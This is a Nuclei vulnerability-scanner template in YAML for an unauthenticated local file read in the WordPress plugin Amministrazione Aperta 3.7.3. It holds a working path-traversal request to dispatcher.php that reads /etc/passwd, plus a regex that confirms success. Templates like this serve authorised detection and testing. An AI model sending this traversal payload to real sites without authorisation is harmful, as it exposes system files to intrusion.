my-nuclei-templates/amministrazione-aperta-lfi....

26 lines
639 B
YAML

id: amministrazione-aperta-lfi
info:
name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read
author: daffainfo,Splint3r7
severity: high
reference:
- https://www.exploit-db.com/exploits/50838
- https://wordpress.org/plugins/amministrazione-aperta
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200